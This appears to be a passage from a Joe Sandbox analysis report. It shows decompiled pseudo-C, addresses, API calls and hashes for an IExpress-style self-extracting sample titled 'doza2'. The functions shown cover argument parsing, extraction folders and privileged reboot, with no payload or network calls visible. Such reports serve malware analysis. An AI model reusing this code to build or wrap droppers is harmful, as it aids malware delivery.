																					goto L70;
																				} else {
																					_t145 = _t142 - 3;
																					if(_t145 == 0) {
																						 *0x308d48 =  *0x308d48 | 0x00000040;
																					} else {
																						_t146 = _t145 - 5;
																						if(_t146 == 0) {
																							 *0x309a2c =  *0x309a2c & 0xfffffffd;
																							goto L70;
																						} else {
																							_t147 = _t146 - 5;
																							if(_t147 == 0) {
																								 *0x309a2c =  *0x309a2c & 0xfffffffe;
																								goto L70;
																							} else {
																								_t149 = _t147;
																								if(_t149 == 0) {
																									 *0x308d48 =  *0x308d48 | 0x00000080;
																								} else {
																									if(_t149 == 3) {
																										 *0x309a2c =  *0x309a2c | 0x00000004;
																										L70:
																										 *0x308a28 = 1;
																									} else {
																										_t209 = 0;
																									}
																								}
																							}
																						}
																					}
																				}
																				_t144 =  *_t220;
																				_t201 = _t144;
																			} while (_t144 != 0);
																		}
																	}
																} else {
																	 *0x309a2c = 3;
																	 *0x308a28 = 1;
																}
																goto L50;
															} else {
																if(_t132 == 0) {
																	goto L98;
																} else {
																	L49:
																	_t209 = 0;
																	L50:
																	_t173 = _v272;
																	if( *_t173 != 0) {
																		goto L2;
																	} else {
																		break;
																	}
																}
															}
														}
													}
												}
											}
										} else {
											goto L106;
										}
									} else {
										L34:
										_t209 = 0;
										break;
									}
								}
							}
						}
						goto L131;
					}
					if( *0x308a2c != 0 &&  *0x308b3e == 0) {
						if(GetModuleFileNameA( *0x309a3c, 0x308b3e, 0x104) == 0) {
							_t209 = 0;
						} else {
							_t202 = 0x5c;
							 *((char*)(E003066C8(0x308b3e, _t202) + 1)) = 0;
						}
					}
					_t63 = _t209;
				}
				L131:
			}

0x00305c9e
0x00305ca9
0x00305cb0
0x00305cb3
0x00305cb6
0x00305cb7
0x00305cb8
0x00305cbd
0x00306204
0x00305ccb
0x00000000
0x00305ccb
0x00305cd3
0x00305cd7
0x00305cf4
0x00000000
0x00305cf4
0x00305cf8
0x00305d00
0x00000000
0x00305d06
0x00305d06
0x00305d0e
0x00305d10
0x00305d12
0x00305d14
0x00305d15
0x00305d17
0x00305d49
0x00000000
0x00000000
0x00000000
0x00000000
0x00305d19
0x00305d19
0x00305d1d
0x00000000
0x00305d3f
0x00305d3f
0x00305d4b
0x00305d4b
0x00305d4f
0x00305d8d
0x00000000
0x00305d93
0x00305d93
0x00305d9a
0x00305d9d
0x00305d9e
0x00000000
0x00305d9e
0x00305d51
0x00305d5b
0x00305d72
0x003060fb
0x003060fb
0x00306207
0x0030620a
0x0030620b
0x0030620e
0x00306217
0x00305d78
0x00305d78
0x00305d80
0x00305d83
0x00305d84
0x00000000
0x00305d84
0x00305d5d
0x00305d5f
0x00305d62
0x00305d68
0x00305d64
0x00305d64
0x00305d64
0x00000000
0x00305d62
0x00305d5b
0x00305d4f
0x00305d1d
0x00000000
0x00305d9f
0x00305d9f
0x00305da5
0x00305dab
0x00305dba
0x00306218
0x0030621d
0x00306220
0x00306221
0x00306229
0x00306230
0x00306247
0x0030626a
0x00306272
0x00306249
0x00306255
0x0030625f
0x00306264
0x00306264
0x00306284
0x00305dc0
0x00305dc0
0x00305dca
0x00305e22
0x00000000
0x00000000
0x00000000
0x00000000
0x00305dcc
0x00305dce
0x00305e24
0x00305e24
0x00305e2c
0x00305e47
0x00305e4a
0x003061d2
0x003061e2
0x003061e7
0x003061ee
0x003061f1
0x003061f1
0x003061f8
0x003061f8
0x00305e50
0x00305e53
0x00306109
0x0030611f
0x00000000
0x00306125
0x00306137
0x0030613a
0x0030613c
0x0030613e
0x0030613e
0x00306141
0x00306141
0x00306143
0x00306144
0x0030614a
0x00000000
0x00306150
0x00306152
0x0030615c
0x00306170
0x00306172
0x0030617c
0x00306190
0x00306190
0x00306196
0x003061a5
0x00000000
0x003061ab
0x003061b9
0x003061c6
0x003061c6
0x0030617e
0x00306180
0x0030618a
0x00000000
0x00000000
0x00000000
0x00000000
0x0030618a
0x0030615e
0x00306160
0x0030616a
0x00000000
0x00000000
0x00000000
0x00000000
0x0030616a
0x0030615c
0x0030614a
0x0030610b
0x0030610e
0x0030610e
0x00000000
0x00305e59
0x00305e59
0x00305e5c
0x0030604f
0x00306056
0x00000000
0x0030605c
0x0030606e
0x00306071
0x00306073
0x00306075
0x00306075
0x00306078
0x00306078
0x0030607a
0x0030607b
0x00306081
0x00000000
0x00306087
0x00306087
0x0030608d
0x0030609c
0x00000000
0x003060a2
0x003060aa
0x003060b2
0x003060b7
0x003060bd
0x003060bf
0x003060bf
0x003060d6
0x003060e0
0x003060e7
0x003060f5
0x00000000
0x00000000
0x00000000
0x00000000
0x003060f5
0x0030609c
0x00306081
0x00305e62
0x00305e62
0x00305e65
0x00305fd3
0x00305fe9
0x00000000
0x00305fef
0x00305fef
0x00305ff7
0x00305ffd
0x00306003
0x00306006
0x00306011
0x00306014
0x0030603d
0x00306016
0x00306018
0x00306019
0x0030601b
0x00306033
0x0030601d
0x00306020
0x00306029
0x00306022
0x00306022
0x00306022
0x00306020
0x0030601b
0x00306042
0x00306044
0x00306046
0x0030604a
0x00305ff7
0x00305fd5
0x00305fd8
0x00305fd8
0x00000000
0x00305e6b
0x00305e6b
0x00305e6e
0x00305f8b
0x00305f99
0x00000000
0x00305f9f
0x00305fa7
0x00305faf
0x00000000
0x00305fb1
0x00305fb3
0x00000000
0x00305fb5
0x00305fb7
0x00000000
0x00305fb9
0x00000000
0x00305fb9
0x00305fb7
0x00305fb3
0x00305faf
0x00305f8d
0x00305f8d
0x00305f8d
0x00305f8f
0x00305fc1
0x00305fc1
0x00305fc1
0x00000000
0x00305e74
0x00305e74
0x00305e77
0x00305ea0
0x00305ebd
0x00305f79
0x00000000
0x00305f7f
0x00305ec3
0x00305ec3
0x00305ecc
0x00305ed4
0x00305ed6
0x00305edc
0x00305edf
0x00305eea
0x00305eed
0x00305f3f
0x00305f40
0x00000000
0x00305eef
0x00305eef
0x00305ef2
0x00305f34
0x00305ef4
0x00305ef4
0x00305ef7
0x00305f2b
0x00000000
0x00305ef9
0x00305ef9
0x00305efc
0x00305f22
0x00000000
0x00305efe
0x00305eff
0x00305f02
0x00305f16
0x00305f04
0x00305f07
0x00305f0d
0x00305f46
0x00305f46
0x00305f09
0x00305f09
0x00305f09
0x00305f07
0x00305f02
0x00305efc
0x00305ef7
0x00305ef2
0x00305f4c
0x00305f4e
0x00305f50
0x00305f54
0x00305ed4
0x00305ea2
0x00305ea4
0x00305eaf
0x00305eaf
0x00000000
0x00305e79
0x00305e7d
0x00000000
0x00305e83
0x00305e83
0x00305e83
0x00305e85
0x00305e85
0x00305e8e
0x00000000
0x00305e94
0x00000000
0x00305e94
0x00305e8e
0x00305e7d
0x00305e77
0x00305e6e
0x00305e65
0x00305e5c
0x00000000
0x00000000
0x00000000
0x00305dd0
0x00305dd0
0x00305dd0
0x00000000
0x00305dd0
0x00305dce
0x00305dca
0x00305dba
0x00000000
0x00305d00
0x00305dd9
0x00305e04
0x003061fe
0x00305e0a
0x00305e0c
0x00305e17
0x00305e17
0x00305e04
0x00306200
0x00306200
0x00000000

APIs

CharNextA.USER32(?,00000000,?,?), ref: 00305CEE
GetModuleFileNameA.KERNEL32(00308B3E,00000104,00000000,?,?), ref: 00305DFC
CharUpperA.USER32(?), ref: 00305E3E
CharUpperA.USER32(-00000052), ref: 00305EE1
CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00305F6F
CharUpperA.USER32(?), ref: 00305FA7
CharUpperA.USER32(-0000004E), ref: 00306008
CharUpperA.USER32(?), ref: 003060AA
CloseHandle.KERNEL32(00000000,00301140,00000000,00000040,00000000), ref: 003061F1
ExitProcess.KERNEL32 ref: 003061F8

Strings

", xrefs: 00305D78
RegServer, xrefs: 00305F66
:, xrefs: 00306118
", xrefs: 0030612D

Memory Dump Source

Source File: 00000001.00000002.385223689.0000000000301000.00000020.00000001.01000000.00000004.sdmp, Offset: 00300000, based on PE: true

Associated: 00000001.00000002.385193125.0000000000300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385558273.0000000000308000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_300000_kino0095.jbxd

Similarity

API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
String ID: "$"$:$RegServer
API String ID: 1203814774-25366791
Opcode ID: 72a835e6eb66ad0ddca10e9d71da5887377a77fa0d204b89b8853dfcc675614a
Instruction ID: 6506f551fbd36d65a29bcf676e01befc5da7a07f79015ac11a6488746ddcd27c
Opcode Fuzzy Hash: 72a835e6eb66ad0ddca10e9d71da5887377a77fa0d204b89b8853dfcc675614a
Instruction Fuzzy Hash: 08D13871A0BA459BEB378B388C793FB3769A716300F1500ABD4C6C69D5D6748E82CF40

Uniqueness

Uniqueness Score: -1.00%

Function 00301F90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94
shutdownCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E00301F90(signed int __ecx, void* __edi, void* __esi) {
				signed int _v8;
				int _v12;
				struct _TOKEN_PRIVILEGES _v24;
				void* _v28;
				void* __ebx;
				signed int _t13;
				int _t21;
				void* _t25;
				int _t28;
				signed char _t30;
				void* _t38;
				void* _t40;
				void* _t41;
				signed int _t46;

				_t41 = __esi;
				_t38 = __edi;
				_t30 = __ecx;
				if((__ecx & 0x00000002) != 0) {
					L12:
					if((_t30 & 0x00000004) != 0) {
						L14:
						if( *0x309a40 != 0) {
							_pop(_t30);
							_t44 = _t46;
							_t13 =  *0x308004; // 0xcd371c79
							_v8 = _t13 ^ _t46;
							_push(_t38);
							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
								_v24.PrivilegeCount = 1;
								_v12 = 2;
								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
								CloseHandle(_v28);
								_t41 = _t41;
								_push(0);
								if(_t21 != 0) {
									if(ExitWindowsEx(2, ??) != 0) {
										_t25 = 1;
									} else {
										_t37 = 0x4f7;
										goto L3;
									}
								} else {
									_t37 = 0x4f6;
									goto L4;
								}
							} else {
								_t37 = 0x4f5;
								L3:
								_push(0);
								L4:
								_push(0x10);
								_push(0);
								_push(0);
								E003044B9(0, _t37);
								_t25 = 0;
							}
							_pop(_t40);
							return E00306CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
						} else {
							_t28 = ExitWindowsEx(2, 0);
							goto L16;
						}
					} else {
						_t37 = 0x522;
						_t28 = E003044B9(0, 0x522, 0x301140, 0, 0x40, 4);
						if(_t28 != 6) {
							goto L16;
						} else {
							goto L14;
						}
					}
				} else {
					__eax = E00301EA7(__ecx);
					if(__eax != 2) {
						L16:
						return _t28;
					} else {
						goto L12;
					}
				}
			}

0x00301f90
0x00301f90
0x00301f93
0x00301f98
0x00301fa4
0x00301fa7
0x00301fc5
0x00301fcd
0x00301fdb
0x00301ee5
0x00301eea
0x00301ef1
0x00301ef4
0x00301f0c
0x00301f2e
0x00301f3a
0x00301f46
0x00301f4d
0x00301f58
0x00301f60
0x00301f61
0x00301f62
0x00301f75
0x00301f80
0x00301f77
0x00301f77
0x00000000
0x00301f77
0x00301f64
0x00301f64
0x00000000
0x00301f64
0x00301f0e
0x00301f0e
0x00301f13
0x00301f13
0x00301f14
0x00301f14
0x00301f16
0x00301f17
0x00301f1a
0x00301f1f
0x00301f1f
0x00301f86
0x00301f8f
0x00301fcf
0x00301fd3
0x00000000
0x00301fd3
0x00301fa9
0x00301fb4
0x00301fbb
0x00301fc3
0x00000000
0x00000000
0x00000000
0x00000000
0x00301fc3
0x00301f9a
0x00301f9a
0x00301fa2
0x00301fd9
0x00301fda
0x00000000
0x00000000
0x00000000
0x00301fa2

APIs

GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00301EFB
OpenProcessToken.ADVAPI32(00000000), ref: 00301F02
ExitWindowsEx.USER32(00000002,00000000), ref: 00301FD3

Strings

SeShutdownPrivilege, xrefs: 00301F28

Memory Dump Source

Source File: 00000001.00000002.385223689.0000000000301000.00000020.00000001.01000000.00000004.sdmp, Offset: 00300000, based on PE: true

Associated: 00000001.00000002.385193125.0000000000300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385558273.0000000000308000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_300000_kino0095.jbxd

Similarity

API ID: Process$CurrentExitOpenTokenWindows
String ID: SeShutdownPrivilege
API String ID: 2795981589-3733053543
Opcode ID: 652c933a95c5199fb9b0c5db74fce9d1cfddb5a808a1d194454d504018b3c65b
Instruction ID: 44221c4f628ff1e70a05b015f3307cf94968ec26f2b3a7e943417b30fd235c0c
Opcode Fuzzy Hash: 652c933a95c5199fb9b0c5db74fce9d1cfddb5a808a1d194454d504018b3c65b
Instruction Fuzzy Hash: 9C21C7B1B433067BDB229BA59C6AFBF77BCEB85B10F11011AFB02E65C1D77488019661

Uniqueness

Uniqueness Score: -1.00%

Function 00306CF0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00306CF0(char _a4) {

				SetUnhandledExceptionFilter(0);
				_t1 =  &_a4; // 0x306e26
				UnhandledExceptionFilter( *_t1);
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x00306cf7
0x00306cfd
0x00306d00
0x00306d19

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00306E26,00301000), ref: 00306CF7
UnhandledExceptionFilter.KERNEL32(&n0,?,00306E26,00301000), ref: 00306D00
GetCurrentProcess.KERNEL32(C0000409,?,00306E26,00301000), ref: 00306D0B
TerminateProcess.KERNEL32(00000000,?,00306E26,00301000), ref: 00306D12

Strings

&n0, xrefs: 00306CFD

Memory Dump Source

Source File: 00000001.00000002.385223689.0000000000301000.00000020.00000001.01000000.00000004.sdmp, Offset: 00300000, based on PE: true

Associated: 00000001.00000002.385193125.0000000000300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385558273.0000000000308000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_300000_kino0095.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
String ID: &n0
API String ID: 3231755760-505845189
Opcode ID: aa5655bc8d06b00223b6ecaf859f1b6fef604147beb802f1ac74f5bec1d08d80
Instruction ID: 856f2d8bca2790cdcbc2b40fa869a2439679c6f6ee00b32e34cd8687130a4d75
Opcode Fuzzy Hash: aa5655bc8d06b00223b6ecaf859f1b6fef604147beb802f1ac74f5bec1d08d80
Instruction Fuzzy Hash: 9CD0C932005B08BBDB062BE1FC1CA5A3F2CEB48313F444002F31A82020CA3244518B52

Uniqueness

Uniqueness Score: -1.00%

Function 00303210 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 188
windowCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E00303210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* __edi;
				void* _t6;
				void* _t10;
				int _t20;
				int _t21;
				int _t23;
				char _t24;
				long _t25;
				int _t27;
				int _t30;
				void* _t32;
				int _t33;
				int _t34;
				int _t37;
				int _t38;
				int _t39;
				void* _t42;
				void* _t46;
				CHAR* _t49;
				void* _t58;
				void* _t63;
				struct HWND__* _t64;

				_t64 = _a4;
				_t6 = _a8 - 0x10;
				if(_t6 == 0) {
					_push(0);
					L38:
					EndDialog(_t64, ??);
					L39:
					__eflags = 1;
					return 1;
				}
				_t42 = 1;
				_t10 = _t6 - 0x100;
				if(_t10 == 0) {
					E003043D0(_t64, GetDesktopWindow());
					SetWindowTextA(_t64, "doza2");
					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
					__eflags =  *0x309a40 - _t42; // 0x3
					if(__eflags == 0) {
						EnableWindow(GetDlgItem(_t64, 0x836), 0);
					}
					L36:
					return _t42;
				}
				if(_t10 == _t42) {
					_t20 = _a12 - 1;
					__eflags = _t20;
					if(_t20 == 0) {
						_t21 = GetDlgItemTextA(_t64, 0x835, 0x3091e4, 0x104);
						__eflags = _t21;
						if(_t21 == 0) {
							L32:
							_t58 = 0x4bf;
							_push(0);
							_push(0x10);
							_push(0);
							_push(0);
							L25:
							E003044B9(_t64, _t58);
							goto L39;
						}
						_t49 = 0x3091e4;
						do {
							_t23 =  *_t49;
							_t49 =  &(_t49[1]);
							__eflags = _t23;
						} while (_t23 != 0);
						__eflags = _t49 - 0x3091e5 - 3;
						if(_t49 - 0x3091e5 < 3) {
							goto L32;
						}
						_t24 =  *0x3091e5; // 0x3a
						__eflags = _t24 - 0x3a;
						if(_t24 == 0x3a) {
							L21:
							_t25 = GetFileAttributesA(0x3091e4);
							__eflags = _t25 - 0xffffffff;
							if(_t25 != 0xffffffff) {
								L26:
								E0030658A(0x3091e4, 0x104, 0x301140);
								_t27 = E003058C8(0x3091e4);
								__eflags = _t27;
								if(_t27 != 0) {
									__eflags =  *0x3091e4 - 0x5c;
									if( *0x3091e4 != 0x5c) {
										L30:
										_t30 = E0030597D(0x3091e4, 1, _t64, 1);
										__eflags = _t30;
										if(_t30 == 0) {
											L35:
											_t42 = 1;
											__eflags = 1;
											goto L36;
										}
										L31:
										_t42 = 1;
										EndDialog(_t64, 1);
										goto L36;
									}
									__eflags =  *0x3091e5 - 0x5c;
									if( *0x3091e5 == 0x5c) {
										goto L31;
									}
									goto L30;
								}
								_push(0);
								_push(0x10);
								_push(0);
								_push(0);
								_t58 = 0x4be;
								goto L25;
							}
							_t32 = E003044B9(_t64, 0x54a, 0x3091e4, 0, 0x20, 4);
							__eflags = _t32 - 6;
							if(_t32 != 6) {
								goto L35;
							}
							_t33 = CreateDirectoryA(0x3091e4, 0);
							__eflags = _t33;
							if(_t33 != 0) {
								goto L26;
							}
							_push(0);
							_push(0x10);
							_push(0);
							_push(0x3091e4);
							_t58 = 0x4cb;
							goto L25;
						}
						__eflags =  *0x3091e4 - 0x5c;
						if( *0x3091e4 != 0x5c) {
							goto L32;
						}
						__eflags = _t24 - 0x5c;
						if(_t24 != 0x5c) {
							goto L32;
						}
						goto L21;
					}
					_t34 = _t20 - 1;
					__eflags = _t34;
					if(_t34 == 0) {
						EndDialog(_t64, 0);
						 *0x309124 = 0x800704c7;
						goto L39;
					}
					__eflags = _t34 != 0x834;
					if(_t34 != 0x834) {
						goto L36;
					}
					_t37 = LoadStringA( *0x309a3c, 0x3e8, 0x308598, 0x200);
					__eflags = _t37;
					if(_t37 != 0) {
						_t38 = E00304224(_t64, _t46, _t46);
						__eflags = _t38;
						if(_t38 == 0) {
							goto L36;
						}
						_t39 = SetDlgItemTextA(_t64, 0x835, 0x3087a0);
						__eflags = _t39;
						if(_t39 != 0) {
							goto L36;
						}
						_t63 = 0x4c0;
						L9:
						E003044B9(_t64, _t63, 0, 0, 0x10, 0);
						_push(0);
						goto L38;
					}
					_t63 = 0x4b1;
					goto L9;
				}
				return 0;
			}

0x0030321b
0x0030321e
0x00303221
0x0030343c
0x0030343e
0x0030343f
0x00303445
0x00303447
0x00000000
0x00303447
0x00303229
0x0030322a
0x0030322f
0x003033ec
0x003033f7
0x00303410
0x00303416
0x0030341d
0x0030342d
0x0030342d
0x00303438
0x00000000
0x00303438
0x00303237
0x00303243
0x00303243
0x00303246
0x003032ee
0x003032f4
0x003032f6
0x003033d4
0x003033d6
0x003033db
0x003033dc
0x003033de
0x003033df
0x00303370
0x00303372
0x00000000
0x00303372
0x003032fc
0x00303301
0x00303301
0x00303303
0x00303304
0x00303304
0x0030330a
0x0030330d
0x00000000
0x00000000
0x00303313
0x00303318
0x0030331a
0x00303331
0x00303332
0x0030333a
0x0030333d
0x0030337c
0x00303388
0x0030338f
0x00303394
0x00303396
0x003033a4
0x003033ab
0x003033b6
0x003033be
0x003033c3
0x003033c5
0x00303435
0x00303437
0x00303437
0x00000000
0x00303437
0x003033c7
0x003033c9
0x003033cc
0x00000000
0x003033cc
0x003033ad
0x003033b4
0x00000000
0x00000000
0x00000000
0x003033b4
0x00303398
0x00303399
0x0030339b
0x0030339c
0x0030339d
0x00000000
0x0030339d
0x0030334c
0x00303351
0x00303354
0x00000000
0x00000000
0x0030335c
0x00303362
0x00303364
0x00000000
0x00000000
0x00303366
0x00303367
0x00303369
0x0030336a
0x0030336b
0x00000000
0x0030336b
0x0030331c
0x00303323
0x00000000
0x00000000
0x00303329
0x0030332b
0x00000000
0x00000000
0x00000000
0x0030332b
0x0030324c
0x0030324c
0x0030324f
0x003032c8
0x003032ce
0x00000000
0x003032ce
0x00303251
0x00303256
0x00000000
0x00000000
0x00303271
0x00303277
0x00303279
0x00303298
0x0030329d
0x0030329f
0x00000000
0x00000000
0x003032b0
0x003032b6
0x003032b8
0x00000000
0x00000000
0x003032be
0x00303280
0x00303289
0x0030328e
0x00000000
0x0030328e
0x0030327b
0x00000000
0x0030327b
0x00000000

APIs

LoadStringA.USER32(000003E8,00308598,00000200), ref: 00303271
GetDesktopWindow.USER32 ref: 003033E2
SetWindowTextA.USER32(?,doza2), ref: 003033F7
SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00303410
GetDlgItem.USER32(?,00000836), ref: 00303426
EnableWindow.USER32(00000000), ref: 0030342D
EndDialog.USER32(?,00000000), ref: 0030343F

Strings

doza2, xrefs: 003033F1
C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 003032E2, 003032E7, 00303331, 00303344, 0030335B, 0030336A

Memory Dump Source

Source File: 00000001.00000002.385223689.0000000000301000.00000020.00000001.01000000.00000004.sdmp, Offset: 00300000, based on PE: true

Associated: 00000001.00000002.385193125.0000000000300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385558273.0000000000308000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_300000_kino0095.jbxd

Similarity

API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$doza2
API String ID: 2418873061-2168475230
Opcode ID: 56947bbcbe293b3f35889722d2896e4d7a4ab863e53e18d6592b4e5a39216ec7
Instruction ID: 1f3a9e30e5da34eed4dc837c45f1f11eb9aade5d0d51b3cd723a0f602c75dc4e
Opcode Fuzzy Hash: 56947bbcbe293b3f35889722d2896e4d7a4ab863e53e18d6592b4e5a39216ec7
Instruction Fuzzy Hash: 5A5179703433407BEB275B366CBCFBB2A4DDB86B54F50402AF2459A5D1CAB48F019262

Uniqueness

Uniqueness Score: -1.00%

Function 00302CAA Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 183
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00302CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t13;
				void* _t20;
				void* _t23;
				void* _t27;
				struct HRSRC__* _t31;
				intOrPtr _t33;
				void* _t43;
				void* _t48;
				signed int _t65;
				struct HINSTANCE__* _t66;
				signed int _t67;

				_t13 =  *0x308004; // 0xcd371c79
				_v8 = _t13 ^ _t67;
				_t65 = 0;
				_t66 = __ecx;
				_t48 = __edx;
				 *0x309a3c = __ecx;
				memset(0x309140, 0, 0x8fc);
				memset(0x308a20, 0, 0x32c);
				memset(0x3088c0, 0, 0x104);
				 *0x3093ec = 1;
				_t20 = E0030468F("TITLE", 0x309154, 0x7f);
				if(_t20 == 0 || _t20 > 0x80) {
					_t64 = 0x4b1;
					goto L32;
				} else {
					_t27 = CreateEventA(0, 1, 1, 0);
					 *0x30858c = _t27;
					SetEvent(_t27);
					_t64 = 0x309a34;
					if(E0030468F("EXTRACTOPT", 0x309a34, 4) != 0) {
						if(( *0x309a34 & 0x000000c0) == 0) {
							L12:
							 *0x309120 =  *0x309120 & _t65;
							if(E00305C9E(_t48, _t48, _t65, _t66) != 0) {
								if( *0x308a3a == 0) {
									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
									if(_t31 != 0) {
										_t65 = LoadResource(_t66, _t31);
									}
									if( *0x308184 != 0) {
										__imp__#17();
									}
									if( *0x308a24 == 0) {
										_t57 = _t65;
										if(E003036EE(_t65) == 0) {
											goto L33;
										} else {
											_t33 =  *0x309a40; // 0x3
											_t48 = 1;
											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
												if(( *0x309a34 & 0x00000100) == 0 || ( *0x308a38 & 0x00000001) != 0 || E003018A3(_t64, _t66) != 0) {
													goto L30;
												} else {
													_t64 = 0x7d6;
													if(E00306517(_t57, 0x7d6, _t34, E003019E0, 0x547, 0x83e) != 0x83d) {
														goto L33;
													} else {
														goto L30;
													}
												}
											} else {
												L30:
												_t23 = _t48;
											}
										}
									} else {
										_t23 = 1;
									}
								} else {
									E00302390(0x308a3a);
									goto L33;
								}
							} else {
								_t64 = 0x520;
								L32:
								E003044B9(0, _t64, 0, 0, 0x10, 0);
								goto L33;
							}
						} else {
							_t64 =  &_v268;
							if(E0030468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
								goto L3;
							} else {
								_t43 = CreateMutexA(0, 1,  &_v268);
								 *0x308588 = _t43;
								if(_t43 == 0 || GetLastError() != 0xb7) {
									goto L12;
								} else {
									if(( *0x309a34 & 0x00000080) == 0) {
										_t64 = 0x524;
										if(E003044B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
											goto L12;
										} else {
											goto L11;
										}
									} else {
										_t64 = 0x54b;
										E003044B9(0, 0x54b, "doza2", 0, 0x10, 0);
										L11:
										CloseHandle( *0x308588);
										 *0x309124 = 0x800700b7;
										goto L33;
									}
								}
							}
						}
					} else {
						L3:
						_t64 = 0x4b1;
						E003044B9(0, 0x4b1, 0, 0, 0x10, 0);
						 *0x309124 = 0x80070714;
						L33:
						_t23 = 0;
					}
				}
				return E00306CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
			}

0x00302cb5
0x00302cbc
0x00302cc7
0x00302cc9
0x00302cd1
0x00302cd3
0x00302cd9
0x00302ce9
0x00302cf9
0x00302d0e
0x00302d15
0x00302d1c
0x00302ef3
0x00000000
0x00302d2d
0x00302d34
0x00302d3b
0x00302d40
0x00302d48
0x00302d59
0x00302d84
0x00302e1f
0x00302e1f
0x00302e2e
0x00302e41
0x00302e5a
0x00302e62
0x00302e6c
0x00302e6c
0x00302e75
0x00302e77
0x00302e77
0x00302e84
0x00302e8b
0x00302e94
0x00000000
0x00302e96
0x00302e96
0x00302e9e
0x00302ea2
0x00302eba
0x00000000
0x00302ece
0x00302ede
0x00302eed
0x00000000
0x00000000
0x00000000
0x00000000
0x00302eed
0x00302eef
0x00302eef
0x00302eef
0x00302eef
0x00302ea2
0x00302e86
0x00302e88
0x00302e88
0x00302e43
0x00302e48
0x00000000
0x00302e48
0x00302e30
0x00302e30
0x00302ef8
0x00302f01
0x00000000
0x00302f01
0x00302d8a
0x00302d8f
0x00302da1
0x00000000
0x00302da3
0x00302dae
0x00302db4
0x00302dbb
0x00000000
0x00302dca
0x00302dd3
0x00302df5
0x00302e02
0x00000000
0x00000000
0x00000000
0x00000000
0x00302dd5
0x00302dde
0x00302de3
0x00302e04
0x00302e0a
0x00302e10
0x00000000
0x00302e10
0x00302dd3
0x00302dbb
0x00302da1
0x00302d5b
0x00302d5b
0x00302d5d
0x00302d69
0x00302d6e
0x00302f06
0x00302f06
0x00302f06
0x00302d59
0x00302f18

APIs

memset.MSVCRT ref: 00302CD9
memset.MSVCRT ref: 00302CE9
memset.MSVCRT ref: 00302CF9

Part of subcall function 0030468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003046A0
Part of subcall function 0030468F: SizeofResource.KERNEL32(00000000,00000000,?,00302D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003046A9
Part of subcall function 0030468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003046C3
Part of subcall function 0030468F: LoadResource.KERNEL32(00000000,00000000,?,00302D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003046CC
Part of subcall function 0030468F: LockResource.KERNEL32(00000000,?,00302D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003046D3
Part of subcall function 0030468F: memcpy_s.MSVCRT ref: 003046E5
Part of subcall function 0030468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003046EF

CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00302D34
SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 00302D40
